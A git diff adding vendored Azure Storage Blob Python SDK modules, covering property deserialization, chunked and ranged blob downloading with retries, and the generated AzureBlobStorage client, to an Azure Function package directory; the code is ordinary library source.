+# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use +from typing import ( # pylint: disable=unused-import + Tuple, Dict, List, + TYPE_CHECKING +) +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy +from ._shared.models import get_enum_value +from ._shared.response_handlers import deserialize_metadata +from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \ + StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule + +if TYPE_CHECKING: + from ._generated.models import PageList + + +def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers): + try: + deserialized_response = response.http_response + except AttributeError: + deserialized_response = response + return cls_method(deserialized_response, obj, headers) + + +def deserialize_blob_properties(response, obj, headers): + blob_properties = BlobProperties( + metadata=deserialize_metadata(response, obj, headers), + object_replication_source_properties=deserialize_ors_policies(response.http_response.headers), + **headers + ) + if 'Content-Range' in headers: + if 'x-ms-blob-content-md5' in headers: + blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5'] + else: + blob_properties.content_settings.content_md5 = None + return blob_properties + + +def deserialize_ors_policies(policy_dictionary): + + if policy_dictionary is None: + return None + # For source blobs (blobs that have policy ids and rule ids applied to them), + # the header will be formatted as "x-ms-or-_: {Complete, Failed}". + # The value of this header is the status of the replication. 
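# Editorial sketch (made-up policy/rule ids, not from this repo): given response
# headers such as
#     {'x-ms-or-policyid1_ruleid1': 'Complete'}
# the parsing below yields
#     [ObjectReplicationPolicy(policy_id='policyid1',
#                              rules=[ObjectReplicationRule(rule_id='ruleid1', status='Complete')])]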
+    or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
+                                if 'or-' in key and key != 'x-ms-or-policy-id'}
+
+    parsed_result = {}
+
+    for key, val in or_policy_status_headers.items():
+        # List Blobs returns 'or-{policy}_{rule}' while Get Blob Properties returns 'x-ms-or-{policy}_{rule}'
+        policy_and_rule_ids = key.split('or-')[1].split('_')
+        policy_id = policy_and_rule_ids[0]
+        rule_id = policy_and_rule_ids[1]
+
+        # If we are seeing this policy for the first time, create a new list to store rule_id -> result
+        parsed_result[policy_id] = parsed_result.get(policy_id) or list()
+        parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
+
+    result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
+
+    return result_list
+
+
+def deserialize_blob_stream(response, obj, headers):
+    blob_properties = deserialize_blob_properties(response, obj, headers)
+    obj.properties = blob_properties
+    return response.http_response.location_mode, obj
+
+
+def deserialize_container_properties(response, obj, headers):
+    metadata = deserialize_metadata(response, obj, headers)
+    container_properties = ContainerProperties(
+        metadata=metadata,
+        **headers
+    )
+    return container_properties
+
+
+def get_page_ranges_result(ranges):
+    # type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
+    page_range = []  # type: ignore
+    clear_range = []  # type: List
+    if ranges.page_range:
+        page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range]  # type: ignore
+    if ranges.clear_range:
+        clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
+    return page_range, clear_range  # type: ignore
+
+
+def service_stats_deserialize(generated):
+    """Deserialize a ServiceStats object into a dict.
+    """
+    return {
+        'geo_replication': {
+            'status': generated.geo_replication.status,
+            'last_sync_time': generated.geo_replication.last_sync_time,
+        }
+    }
+
+
+def service_properties_deserialize(generated):
+    """Deserialize a ServiceProperties object into a dict.
+ """ + return { + 'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging), # pylint: disable=protected-access + 'hour_metrics': Metrics._from_generated(generated.hour_metrics), # pylint: disable=protected-access + 'minute_metrics': Metrics._from_generated(generated.minute_metrics), # pylint: disable=protected-access + 'cors': [CorsRule._from_generated(cors) for cors in generated.cors], # pylint: disable=protected-access + 'target_version': generated.default_service_version, # pylint: disable=protected-access + 'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy), # pylint: disable=protected-access + 'static_website': StaticWebsite._from_generated(generated.static_website), # pylint: disable=protected-access + } + + +def get_blob_properties_from_generated_code(generated): + blob = BlobProperties() + if generated.name.encoded: + blob.name = unquote(generated.name.content) + else: + blob.name = generated.name.content + blob_type = get_enum_value(generated.properties.blob_type) + blob.blob_type = BlobType(blob_type) if blob_type else None + blob.etag = generated.properties.etag + blob.deleted = generated.deleted + blob.snapshot = generated.snapshot + blob.is_append_blob_sealed = generated.properties.is_sealed + blob.metadata = generated.metadata.additional_properties if generated.metadata else {} + blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None + blob.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access + blob.copy = CopyProperties._from_generated(generated) # pylint: disable=protected-access + blob.last_modified = generated.properties.last_modified + blob.creation_time = generated.properties.creation_time + blob.content_settings = ContentSettings._from_generated(generated) # pylint: disable=protected-access + blob.size = generated.properties.content_length + blob.page_blob_sequence_number = generated.properties.blob_sequence_number + blob.server_encrypted = generated.properties.server_encrypted + blob.encryption_scope = generated.properties.encryption_scope + blob.deleted_time = generated.properties.deleted_time + blob.remaining_retention_days = generated.properties.remaining_retention_days + blob.blob_tier = generated.properties.access_tier + blob.rehydrate_priority = generated.properties.rehydrate_priority + blob.blob_tier_inferred = generated.properties.access_tier_inferred + blob.archive_status = generated.properties.archive_status + blob.blob_tier_change_time = generated.properties.access_tier_change_time + blob.version_id = generated.version_id + blob.is_current_version = generated.is_current_version + blob.tag_count = generated.properties.tag_count + blob.tags = parse_tags(generated.blob_tags) # pylint: disable=protected-access + blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata) + blob.last_accessed_on = generated.properties.last_accessed_on + blob.immutability_policy = ImmutabilityPolicy._from_generated(generated) # pylint: disable=protected-access + blob.has_legal_hold = generated.properties.legal_hold + blob.has_versions_only = generated.has_versions_only + return blob + + +def parse_tags(generated_tags): + # type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None] + """Deserialize a list of BlobTag objects into a dict. 
+ """ + if generated_tags: + tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set} + return tag_dict + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py new file mode 100644 index 0000000..04a5a86 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py @@ -0,0 +1,646 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import sys +import threading +import time + +import warnings +from io import BytesIO +from typing import Iterator, Union + +import requests +from azure.core.exceptions import HttpResponseError, ServiceResponseError + +from azure.core.tracing.common import with_current_context +from ._shared.encryption import decrypt_blob +from ._shared.request_handlers import validate_and_format_range_headers +from ._shared.response_handlers import process_storage_error, parse_length_from_content_range +from ._deserialize import get_page_ranges_result + + +def process_range_and_offset(start_range, end_range, length, encryption): + start_offset, end_offset = 0, 0 + if encryption.get("key") is not None or encryption.get("resolver") is not None: + if start_range is not None: + # Align the start of the range along a 16 byte block + start_offset = start_range % 16 + start_range -= start_offset + + # Include an extra 16 bytes for the IV if necessary + # Because of the previous offsetting, start_range will always + # be a multiple of 16. 
+ if start_range > 0: + start_offset += 16 + start_range -= 16 + + if length is not None: + # Align the end of the range along a 16 byte block + end_offset = 15 - (end_range % 16) + end_range += end_offset + + return (start_range, end_range), (start_offset, end_offset) + + +def process_content(data, start_offset, end_offset, encryption): + if data is None: + raise ValueError("Response cannot be None.") + + content = b"".join(list(data)) + + if content and encryption.get("key") is not None or encryption.get("resolver") is not None: + try: + return decrypt_blob( + encryption.get("required"), + encryption.get("key"), + encryption.get("resolver"), + content, + start_offset, + end_offset, + data.response.headers, + ) + except Exception as error: + raise HttpResponseError(message="Decryption failed.", response=data.response, error=error) + return content + + +class _ChunkDownloader(object): # pylint: disable=too-many-instance-attributes + def __init__( + self, + client=None, + non_empty_ranges=None, + total_size=None, + chunk_size=None, + current_progress=None, + start_range=None, + end_range=None, + stream=None, + parallel=None, + validate_content=None, + encryption_options=None, + progress_hook=None, + **kwargs + ): + self.client = client + self.non_empty_ranges = non_empty_ranges + + # Information on the download range/chunk size + self.chunk_size = chunk_size + self.total_size = total_size + self.start_index = start_range + self.end_index = end_range + + # The destination that we will write to + self.stream = stream + self.stream_lock = threading.Lock() if parallel else None + self.progress_lock = threading.Lock() if parallel else None + self.progress_hook = progress_hook + + # For a parallel download, the stream is always seekable, so we note down the current position + # in order to seek to the right place when out-of-order chunks come in + self.stream_start = stream.tell() if parallel else None + + # Download progress so far + self.progress_total = current_progress + + # Encryption + self.encryption_options = encryption_options + + # Parameters for each get operation + self.validate_content = validate_content + self.request_options = kwargs + + def _calculate_range(self, chunk_start): + if chunk_start + self.chunk_size > self.end_index: + chunk_end = self.end_index + else: + chunk_end = chunk_start + self.chunk_size + return chunk_start, chunk_end + + def get_chunk_offsets(self): + index = self.start_index + while index < self.end_index: + yield index + index += self.chunk_size + + def process_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + chunk_data = self._download_chunk(chunk_start, chunk_end - 1) + length = chunk_end - chunk_start + if length > 0: + self._write_to_stream(chunk_data, chunk_start) + self._update_progress(length) + + def yield_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + return self._download_chunk(chunk_start, chunk_end - 1) + + def _update_progress(self, length): + if self.progress_lock: + with self.progress_lock: # pylint: disable=not-context-manager + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + self.progress_hook(self.progress_total, self.total_size) + + def _write_to_stream(self, chunk_data, chunk_start): + if self.stream_lock: + with self.stream_lock: # pylint: disable=not-context-manager + self.stream.seek(self.stream_start + (chunk_start - self.start_index)) + self.stream.write(chunk_data) + else: + 
self.stream.write(chunk_data) + + def _do_optimize(self, given_range_start, given_range_end): + # If we have no page range list stored, then assume there's data everywhere for that page blob + # or it's a block blob or append blob + if self.non_empty_ranges is None: + return False + + for source_range in self.non_empty_ranges: + # Case 1: As the range list is sorted, if we've reached such a source_range + # we've checked all the appropriate source_range already and haven't found any overlapping. + # so the given range doesn't have any data and download optimization could be applied. + # given range: | | + # source range: | | + if given_range_end < source_range['start']: # pylint:disable=no-else-return + return True + # Case 2: the given range comes after source_range, continue checking. + # given range: | | + # source range: | | + elif source_range['end'] < given_range_start: + pass + # Case 3: source_range and given range overlap somehow, no need to optimize. + else: + return False + # Went through all src_ranges, but nothing overlapped. Optimization will be applied. + return True + + def _download_chunk(self, chunk_start, chunk_end): + download_range, offset = process_range_and_offset( + chunk_start, chunk_end, chunk_end, self.encryption_options + ) + + # No need to download the empty chunk from server if there's no data in the chunk to be downloaded. + # Do optimize and create empty chunk locally if condition is met. + if self._do_optimize(download_range[0], download_range[1]): + chunk_data = b"\x00" * self.chunk_size + else: + range_header, range_validation = validate_and_format_range_headers( + download_range[0], + download_range[1], + check_content_md5=self.validate_content + ) + + retry_active = True + retry_total = 3 + while retry_active: + try: + _, response = self.client.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self.validate_content, + data_stream_total=self.total_size, + download_stream_current=self.progress_total, + **self.request_options + ) + except HttpResponseError as error: + process_storage_error(error) + + try: + chunk_data = process_content(response, offset[0], offset[1], self.encryption_options) + retry_active = False + except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError) as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + time.sleep(1) + + # This makes sure that if_match is set so that we can validate + # that subsequent downloads are to an unmodified blob + if self.request_options.get("modified_access_conditions"): + self.request_options["modified_access_conditions"].if_match = response.properties.etag + + return chunk_data + + +class _ChunkIterator(object): + """Async iterator for chunks in blob download stream.""" + + def __init__(self, size, content, downloader, chunk_size): + self.size = size + self._chunk_size = chunk_size + self._current_content = content + self._iter_downloader = downloader + self._iter_chunks = None + self._complete = (size == 0) + + def __len__(self): + return self.size + + def __iter__(self): + return self + + def __next__(self): + """Iterate through responses.""" + if self._complete: + raise StopIteration("Download complete") + if not self._iter_downloader: + # cut the data obtained from initial GET into chunks + if len(self._current_content) > self._chunk_size: + return self._get_chunk_data() + self._complete = True + return self._current_content + + if not self._iter_chunks: + self._iter_chunks = 
self._iter_downloader.get_chunk_offsets() + + # initial GET result still has more than _chunk_size bytes of data + if len(self._current_content) >= self._chunk_size: + return self._get_chunk_data() + + try: + chunk = next(self._iter_chunks) + self._current_content += self._iter_downloader.yield_chunk(chunk) + except StopIteration as e: + self._complete = True + if self._current_content: + return self._current_content + raise e + + # the current content from the first get is still there but smaller than chunk size + # therefore we want to make sure its also included + return self._get_chunk_data() + + next = __next__ # Python 2 compatibility. + + def _get_chunk_data(self): + chunk_data = self._current_content[: self._chunk_size] + self._current_content = self._current_content[self._chunk_size:] + return chunk_data + + +class StorageStreamDownloader(object): # pylint: disable=too-many-instance-attributes + """A streaming object to download from Azure Storage. + + :ivar str name: + The name of the blob being downloaded. + :ivar str container: + The name of the container where the blob is. + :ivar ~azure.storage.blob.BlobProperties properties: + The properties of the blob being downloaded. If only a range of the data is being + downloaded, this will be reflected in the properties. + :ivar int size: + The size of the total data in the stream. This will be the byte range if specified, + otherwise the total size of the blob. + """ + + def __init__( + self, + clients=None, + config=None, + start_range=None, + end_range=None, + validate_content=None, + encryption_options=None, + max_concurrency=1, + name=None, + container=None, + encoding=None, + **kwargs + ): + self.name = name + self.container = container + self.properties = None + self.size = None + + self._clients = clients + self._config = config + self._start_range = start_range + self._end_range = end_range + self._max_concurrency = max_concurrency + self._encoding = encoding + self._validate_content = validate_content + self._encryption_options = encryption_options or {} + self._progress_hook = kwargs.pop('progress_hook', None) + self._request_options = kwargs + self._location_mode = None + self._download_complete = False + self._current_content = None + self._file_size = None + self._non_empty_ranges = None + self._response = None + + # The service only provides transactional MD5s for chunks under 4MB. + # If validate_content is on, get only self.MAX_CHUNK_GET_SIZE for the first + # chunk so a transactional MD5 can be retrieved. 
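# Editorial note (assuming this SDK's usual defaults of a 32 MiB
# max_single_get_size and 4 MiB max_chunk_get_size; check your _config): a
# plain download fetches up to 32 MiB in the initial request, while
# validate_content=True caps the first request at 4 MiB so the service can
# return a transactional MD5 for it.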
+ self._first_get_size = ( + self._config.max_single_get_size if not self._validate_content else self._config.max_chunk_get_size + ) + initial_request_start = self._start_range if self._start_range is not None else 0 + if self._end_range is not None and self._end_range - self._start_range < self._first_get_size: + initial_request_end = self._end_range + else: + initial_request_end = initial_request_start + self._first_get_size - 1 + + self._initial_range, self._initial_offset = process_range_and_offset( + initial_request_start, initial_request_end, self._end_range, self._encryption_options + ) + + self._response = self._initial_request() + self.properties = self._response.properties + self.properties.name = self.name + self.properties.container = self.container + + # Set the content length to the download size instead of the size of + # the last range + self.properties.size = self.size + + # Overwrite the content range to the user requested range + self.properties.content_range = "bytes {0}-{1}/{2}".format( + self._start_range, + self._end_range, + self._file_size + ) + + # Overwrite the content MD5 as it is the MD5 for the last range instead + # of the stored MD5 + # TODO: Set to the stored MD5 when the service returns this + self.properties.content_md5 = None + + def __len__(self): + return self.size + + def _initial_request(self): + range_header, range_validation = validate_and_format_range_headers( + self._initial_range[0], + self._initial_range[1], + start_range_required=False, + end_range_required=False, + check_content_md5=self._validate_content + ) + + retry_active = True + retry_total = 3 + while retry_active: + try: + location_mode, response = self._clients.blob.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self._validate_content, + data_stream_total=None, + download_stream_current=0, + **self._request_options + ) + + # Check the location we read from to ensure we use the same one + # for subsequent requests. + self._location_mode = location_mode + + # Parse the total file size and adjust the download size if ranges + # were specified + self._file_size = parse_length_from_content_range(response.properties.content_range) + if self._end_range is not None: + # Use the end range index unless it is over the end of the file + self.size = min(self._file_size, self._end_range - self._start_range + 1) + elif self._start_range is not None: + self.size = self._file_size - self._start_range + else: + self.size = self._file_size + + except HttpResponseError as error: + if self._start_range is None and error.response.status_code == 416: + # Get range will fail on an empty file. If the user did not + # request a range, do a regular get request in order to get + # any properties. 
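# Editorial note: this path is hit for zero-length blobs, where a ranged GET
# returns 416 (Range Not Satisfiable); the plain GET below still retrieves
# the blob's properties, and the download size is then set to 0.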
+ try: + _, response = self._clients.blob.download( + validate_content=self._validate_content, + data_stream_total=0, + download_stream_current=0, + **self._request_options + ) + except HttpResponseError as error: + process_storage_error(error) + + # Set the download size to empty + self.size = 0 + self._file_size = 0 + else: + process_storage_error(error) + + try: + if self.size == 0: + self._current_content = b"" + else: + self._current_content = process_content( + response, + self._initial_offset[0], + self._initial_offset[1], + self._encryption_options + ) + retry_active = False + except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError) as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + time.sleep(1) + + # get page ranges to optimize downloading sparse page blob + if response.properties.blob_type == 'PageBlob': + try: + page_ranges = self._clients.page_blob.get_page_ranges() + self._non_empty_ranges = get_page_ranges_result(page_ranges)[0] + # according to the REST API documentation: + # in a highly fragmented page blob with a large number of writes, + # a Get Page Ranges request can fail due to an internal server timeout. + # thus, if the page blob is not sparse, it's ok for it to fail + except HttpResponseError: + pass + + # If the file is small, the download is complete at this point. + # If file size is large, download the rest of the file in chunks. + if response.properties.size != self.size: + if self._request_options.get("modified_access_conditions"): + self._request_options["modified_access_conditions"].if_match = response.properties.etag + else: + self._download_complete = True + return response + + def chunks(self): + # type: () -> Iterator[bytes] + """Iterate over chunks in the download stream. + + :rtype: Iterator[bytes] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world.py + :start-after: [START download_a_blob_in_chunk] + :end-before: [END download_a_blob_in_chunk] + :language: python + :dedent: 12 + :caption: Download a blob using chunks(). + """ + if self.size == 0 or self._download_complete: + iter_downloader = None + else: + data_end = self._file_size + if self._end_range is not None: + # Use the end range index unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + iter_downloader = _ChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # start where the first download ended + end_range=data_end, + stream=None, + parallel=False, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + **self._request_options + ) + return _ChunkIterator( + size=self.size, + content=self._current_content, + downloader=iter_downloader, + chunk_size=self._config.max_chunk_get_size) + + def readall(self): + # type: () -> Union[bytes, str] + """Download the contents of this blob. + + This operation is blocking until all data is downloaded. + :rtype: bytes or str + """ + stream = BytesIO() + self.readinto(stream) + data = stream.getvalue() + if self._encoding: + return data.decode(self._encoding) + return data + + def content_as_bytes(self, max_concurrency=1): + """Download the contents of this file. + + This operation is blocking until all data is downloaded. 
+
+        :keyword int max_concurrency:
+            The number of parallel connections with which to download.
+        :rtype: bytes
+        """
+        warnings.warn(
+            "content_as_bytes is deprecated, use readall instead",
+            DeprecationWarning
+        )
+        self._max_concurrency = max_concurrency
+        return self.readall()
+
+    def content_as_text(self, max_concurrency=1, encoding="UTF-8"):
+        """Download the contents of this blob, and decode as text.
+
+        This operation is blocking until all data is downloaded.
+
+        :keyword int max_concurrency:
+            The number of parallel connections with which to download.
+        :param str encoding:
+            Text encoding to decode the downloaded bytes. Default is UTF-8.
+        :rtype: str
+        """
+        warnings.warn(
+            "content_as_text is deprecated, use readall instead",
+            DeprecationWarning
+        )
+        self._max_concurrency = max_concurrency
+        self._encoding = encoding
+        return self.readall()
+
+    def readinto(self, stream):
+        """Download the contents of this blob to a stream.
+
+        :param stream:
+            The stream to download to. This can be an open file-handle,
+            or any writable stream. The stream must be seekable if the download
+            uses more than one parallel connection.
+        :returns: The number of bytes read.
+        :rtype: int
+        """
+        # The stream must be seekable if parallel download is required
+        parallel = self._max_concurrency > 1
+        if parallel:
+            error_message = "Target stream handle must be seekable."
+            if sys.version_info >= (3,) and not stream.seekable():
+                raise ValueError(error_message)
+
+            try:
+                stream.seek(stream.tell())
+            except (NotImplementedError, AttributeError):
+                raise ValueError(error_message)
+
+        # Write the content to the user stream
+        stream.write(self._current_content)
+        if self._progress_hook:
+            self._progress_hook(len(self._current_content), self.size)
+
+        if self._download_complete:
+            return self.size
+
+        data_end = self._file_size
+        if self._end_range is not None:
+            # Use the length unless it is over the end of the file
+            data_end = min(self._file_size, self._end_range + 1)
+
+        downloader = _ChunkDownloader(
+            client=self._clients.blob,
+            non_empty_ranges=self._non_empty_ranges,
+            total_size=self.size,
+            chunk_size=self._config.max_chunk_get_size,
+            current_progress=self._first_get_size,
+            start_range=self._initial_range[1] + 1,  # Start where the first download ended
+            end_range=data_end,
+            stream=stream,
+            parallel=parallel,
+            validate_content=self._validate_content,
+            encryption_options=self._encryption_options,
+            use_location=self._location_mode,
+            progress_hook=self._progress_hook,
+            **self._request_options
+        )
+        if parallel:
+            import concurrent.futures
+            with concurrent.futures.ThreadPoolExecutor(self._max_concurrency) as executor:
+                list(executor.map(
+                    with_current_context(downloader.process_chunk),
+                    downloader.get_chunk_offsets()
+                ))
+        else:
+            for chunk in downloader.get_chunk_offsets():
+                downloader.process_chunk(chunk)
+        return self.size
+
+    def download_to_stream(self, stream, max_concurrency=1):
+        """Download the contents of this blob to a stream.
+
+        :param stream:
+            The stream to download to. This can be an open file-handle,
+            or any writable stream. The stream must be seekable if the download
+            uses more than one parallel connection.
+        :returns: The properties of the downloaded blob.
+ :rtype: Any + """ + warnings.warn( + "download_to_stream is deprecated, use readinto instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + self.readinto(stream) + return self.properties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py new file mode 100644 index 0000000..689b3d3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py @@ -0,0 +1,15 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._azure_blob_storage import AzureBlobStorage +__all__ = ['AzureBlobStorage'] + +# `._patch.py` is used for handwritten extensions to the generated code +# Example: https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +from ._patch import patch_sdk +patch_sdk() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f91f8a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc new file mode 100644 index 0000000..d7693ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc new file mode 100644 index 0000000..50db621 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc new file mode 100644 index 0000000..ce2edf3 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc new file mode 100644 index 0000000..96066fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py new file mode 100644 index 0000000..dd4646a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py @@ -0,0 +1,111 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from copy import deepcopy +from typing import TYPE_CHECKING + +from msrest import Deserializer, Serializer + +from azure.core import PipelineClient + +from . import models +from ._configuration import AzureBlobStorageConfiguration +from .operations import AppendBlobOperations, BlobOperations, BlockBlobOperations, ContainerOperations, PageBlobOperations, ServiceOperations + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any + + from azure.core.rest import HttpRequest, HttpResponse + +class AzureBlobStorage(object): + """AzureBlobStorage. + + :ivar service: ServiceOperations operations + :vartype service: azure.storage.blob.operations.ServiceOperations + :ivar container: ContainerOperations operations + :vartype container: azure.storage.blob.operations.ContainerOperations + :ivar blob: BlobOperations operations + :vartype blob: azure.storage.blob.operations.BlobOperations + :ivar page_blob: PageBlobOperations operations + :vartype page_blob: azure.storage.blob.operations.PageBlobOperations + :ivar append_blob: AppendBlobOperations operations + :vartype append_blob: azure.storage.blob.operations.AppendBlobOperations + :ivar block_blob: BlockBlobOperations operations + :vartype block_blob: azure.storage.blob.operations.BlockBlobOperations + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :param base_url: Service URL. Default value is "". + :type base_url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url, # type: str + base_url="", # type: str + **kwargs # type: Any + ): + # type: (...) 
-> None + self._config = AzureBlobStorageConfiguration(url=url, **kwargs) + self._client = PipelineClient(base_url=base_url, config=self._config, **kwargs) + + client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)} + self._serialize = Serializer(client_models) + self._deserialize = Deserializer(client_models) + self._serialize.client_side_validation = False + self.service = ServiceOperations(self._client, self._config, self._serialize, self._deserialize) + self.container = ContainerOperations(self._client, self._config, self._serialize, self._deserialize) + self.blob = BlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.page_blob = PageBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.append_blob = AppendBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.block_blob = BlockBlobOperations(self._client, self._config, self._serialize, self._deserialize) + + + def _send_request( + self, + request, # type: HttpRequest + **kwargs # type: Any + ): + # type: (...) -> HttpResponse + """Runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest("GET", "https://www.example.org/") + + >>> response = client._send_request(request) + + + For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.HttpResponse + """ + + request_copy = deepcopy(request) + request_copy.url = self._client.format_url(request_copy.url) + return self._client.send_request(request_copy, **kwargs) + + def close(self): + # type: () -> None + self._client.close() + + def __enter__(self): + # type: () -> AzureBlobStorage + self._client.__enter__() + return self + + def __exit__(self, *exc_details): + # type: (Any) -> None + self._client.__exit__(*exc_details) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py new file mode 100644 index 0000000..c9a2b7e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py @@ -0,0 +1,64 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
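The generated client above can also be driven with raw requests, as its _send_request docstring describes. A minimal sketch — the account URL is a placeholder and no credential is attached, so a real call would simply come back with an authentication error status:

from azure.core.rest import HttpRequest
from azure.storage.blob._generated import AzureBlobStorage

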